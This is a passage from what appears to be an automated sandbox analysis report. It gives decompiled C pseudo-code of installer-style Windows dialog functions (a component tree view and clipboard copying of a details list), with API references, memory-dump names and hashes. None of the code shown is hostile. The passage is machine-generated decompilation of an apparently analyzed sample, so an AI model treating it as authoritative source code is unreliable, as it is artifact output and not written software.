				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                  0x004030c1
                                                  0x004030c7

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0002F9E4), ref: 004030C1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x825438
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                  0x00404fcb
                                                  0x00404fd1
                                                  0x00404fda
                                                  0x00404fdd
                                                  0x0040516e
                                                  0x00405175
                                                  0x00405199
                                                  0x00405199
                                                  0x0040519f
                                                  0x004051ac
                                                  0x004051ca
                                                  0x004051ca
                                                  0x004051d1
                                                  0x00405228
                                                  0x00405228
                                                  0x0040522c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040522e
                                                  0x00405231
                                                  0x00000000
                                                  0x00000000
                                                  0x0040523b
                                                  0x00405241
                                                  0x00405243
                                                  0x00405246
                                                  0x0040533f
                                                  0x00000000
                                                  0x0040533f
                                                  0x00405255
                                                  0x00405261
                                                  0x00405267
                                                  0x0040526a
                                                  0x0040526d
                                                  0x00405282
                                                  0x00405285
                                                  0x00405285
                                                  0x00405288
                                                  0x0040526f
                                                  0x00405274
                                                  0x0040527a
                                                  0x0040527d
                                                  0x0040527d
                                                  0x00405298
                                                  0x004052a0
                                                  0x004052a1
                                                  0x004052a3
                                                  0x004052ac
                                                  0x004052af
                                                  0x004052b6
                                                  0x004052bd
                                                  0x004052c5
                                                  0x004052c5
                                                  0x004052d3
                                                  0x004052d9
                                                  0x004052dc
                                                  0x004052dc
                                                  0x004052e3
                                                  0x004052e9
                                                  0x004052f2
                                                  0x004052f9
                                                  0x00405302
                                                  0x00405304
                                                  0x00405307
                                                  0x00405316
                                                  0x00405318
                                                  0x0040531e
                                                  0x0040531f
                                                  0x00405320
                                                  0x00405320
                                                  0x00405328
                                                  0x00405333
                                                  0x00405339
                                                  0x00405339
                                                  0x00000000
                                                  0x004052a3
                                                  0x004051d3
                                                  0x004051d9
                                                  0x00405209
                                                  0x0040520b
                                                  0x00405211
                                                  0x0040521c
                                                  0x0040521c
                                                  0x00405223
                                                  0x00000000
                                                  0x00405223
                                                  0x004051dd
                                                  0x004051e7
                                                  0x00000000
                                                  0x004051ae
                                                  0x004051ae
                                                  0x004051b4
                                                  0x004051ec
                                                  0x00000000
                                                  0x004051f5
                                                  0x004051bd
                                                  0x004051c2
                                                  0x004051c5
                                                  0x00000000
                                                  0x004051c5
                                                  0x004051ac
                                                  0x00404fe3
                                                  0x00404fe7
                                                  0x00404ff0
                                                  0x00404ff7
                                                  0x00404ffa
                                                  0x00404ffd
                                                  0x00405000
                                                  0x00405001
                                                  0x00405002
                                                  0x0040501b
                                                  0x0040501e
                                                  0x00405028
                                                  0x00405037
                                                  0x0040503f
                                                  0x00405047
                                                  0x0040504c
                                                  0x0040504f
                                                  0x0040505b
                                                  0x00405064
                                                  0x0040506d
                                                  0x00405090
                                                  0x00405096
                                                  0x004050a7
                                                  0x004050ac
                                                  0x004050ba
                                                  0x004050c8
                                                  0x004050c8
                                                  0x004050cd
                                                  0x004050db
                                                  0x004050db
                                                  0x004050e0
                                                  0x004050e3
                                                  0x004050e8
                                                  0x004050f4
                                                  0x004050fd
                                                  0x0040510a
                                                  0x00405119
                                                  0x0040510c
                                                  0x00405111
                                                  0x00405111
                                                  0x00405125
                                                  0x00405125
                                                  0x00405139
                                                  0x00405142
                                                  0x0040514b
                                                  0x0040515b
                                                  0x00405167
                                                  0x00405167
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00405021
                                                  • GetDlgItem.USER32 ref: 00405030
                                                  • GetClientRect.USER32 ref: 0040506D
                                                  • GetSystemMetrics.USER32 ref: 00405075
                                                  • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405096
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050A7
                                                  • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BA
                                                  • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050C8
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050DB
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004050FD
                                                  • ShowWindow.USER32(?,00000008), ref: 00405111
                                                  • GetDlgItem.USER32 ref: 00405132
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405142
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040515B
                                                  • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405167
                                                  • GetDlgItem.USER32 ref: 0040503F
                                                    • Part of subcall function 00403E89: SendMessageA.USER32(00000028,?,00000001,00403CBA), ref: 00403E97
                                                  • GetDlgItem.USER32 ref: 00405184
                                                  • CreateThread.KERNEL32 ref: 00405192
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                  • ShowWindow.USER32(00000000), ref: 004051BD
                                                  • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                  • ShowWindow.USER32(00000008), ref: 00405209
                                                  • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040523B
                                                  • CreatePopupMenu.USER32 ref: 0040524C
                                                  • AppendMenuA.USER32 ref: 00405261
                                                  • GetWindowRect.USER32 ref: 00405274
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D3
                                                  • OpenClipboard.USER32(00000000), ref: 004052E3
                                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004052E9
                                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                                  • GlobalLock.KERNEL32 ref: 004052FC
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405310
                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                                  • SetClipboardData.USER32 ref: 00405333
                                                  • CloseClipboard.USER32 ref: 00405339
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {
                                                  • API String ID: 590372296-366298937
                                                  • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                  • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                                  • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                                  • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004047D3, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004047D3(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423f68; // 0x8255e4
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423f50; // 0x825438
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423f59 & 0x00000002;
							if(( *0x423f59 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x3
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x8255e4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x82d0fc
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x8255ec
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x8255fc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x3
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x3
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x3
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x3
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                  0x004047f1
                                                  0x004047f7
                                                  0x004047f9
                                                  0x004047ff
                                                  0x00404805
                                                  0x00404808
                                                  0x00404812
                                                  0x0040481b
                                                  0x0040481e
                                                  0x00404821
                                                  0x00404a49
                                                  0x00404a49
                                                  0x00404a50
                                                  0x00404a64
                                                  0x00404a52
                                                  0x00404a54
                                                  0x00404a57
                                                  0x00404a58
                                                  0x00404a5f
                                                  0x00404a5f
                                                  0x00404a67
                                                  0x00404a70
                                                  0x00404a7b
                                                  0x00404a7b
                                                  0x00404a7e
                                                  0x00404a81
                                                  0x00404a90
                                                  0x00404a90
                                                  0x00404a97
                                                  0x00404b0f
                                                  0x00404b0f
                                                  0x00404b12
                                                  0x00404b14
                                                  0x00404b17
                                                  0x00404b1e
                                                  0x00404b2c
                                                  0x00404b2c
                                                  0x00404b2e
                                                  0x00404b31
                                                  0x00404b38
                                                  0x00404b3a
                                                  0x00404b3e
                                                  0x00404b5b
                                                  0x00404b5f
                                                  0x00404b5f
                                                  0x00404b40
                                                  0x00404b4d
                                                  0x00404b4d
                                                  0x00404b3e
                                                  0x00404b38
                                                  0x00000000
                                                  0x00404b12
                                                  0x00404a99
                                                  0x00404a9c
                                                  0x00404aa7
                                                  0x00404aa9
                                                  0x00404aac
                                                  0x00404ab3
                                                  0x00404ab8
                                                  0x00404aba
                                                  0x00404ac4
                                                  0x00404ac4
                                                  0x00404ac8
                                                  0x00404aca
                                                  0x00404acd
                                                  0x00404acf
                                                  0x00404ad2
                                                  0x00404ae8
                                                  0x00404ae8
                                                  0x00404ad4
                                                  0x00404ad4
                                                  0x00404ada
                                                  0x00404adc
                                                  0x00404ae3
                                                  0x00404ade
                                                  0x00404ade
                                                  0x00404ade
                                                  0x00404adc
                                                  0x00404aec
                                                  0x00404aee
                                                  0x00404af3
                                                  0x00404afc
                                                  0x00404afd
                                                  0x00404b07
                                                  0x00404b07
                                                  0x00404b09
                                                  0x00404b0c
                                                  0x00404b0c
                                                  0x00404acd
                                                  0x00000000
                                                  0x00404aba
                                                  0x00404a9e
                                                  0x00404aa1
                                                  0x00404aa5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404aa5
                                                  0x00404a83
                                                  0x00404a8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404a72
                                                  0x00404a72
                                                  0x00404a75
                                                  0x00404b62
                                                  0x00404b62
                                                  0x00404b69
                                                  0x00404bdd
                                                  0x00404bdd
                                                  0x00404be4
                                                  0x00404bf0
                                                  0x00404bf0
                                                  0x00404bf2
                                                  0x00404bf9
                                                  0x00404bfb
                                                  0x00404c00
                                                  0x00404c02
                                                  0x00404c05
                                                  0x00404c05
                                                  0x00404c0b
                                                  0x00404c10
                                                  0x00404c12
                                                  0x00404c15
                                                  0x00404c15
                                                  0x00404c1b
                                                  0x00404c21
                                                  0x00404c27
                                                  0x00404c27
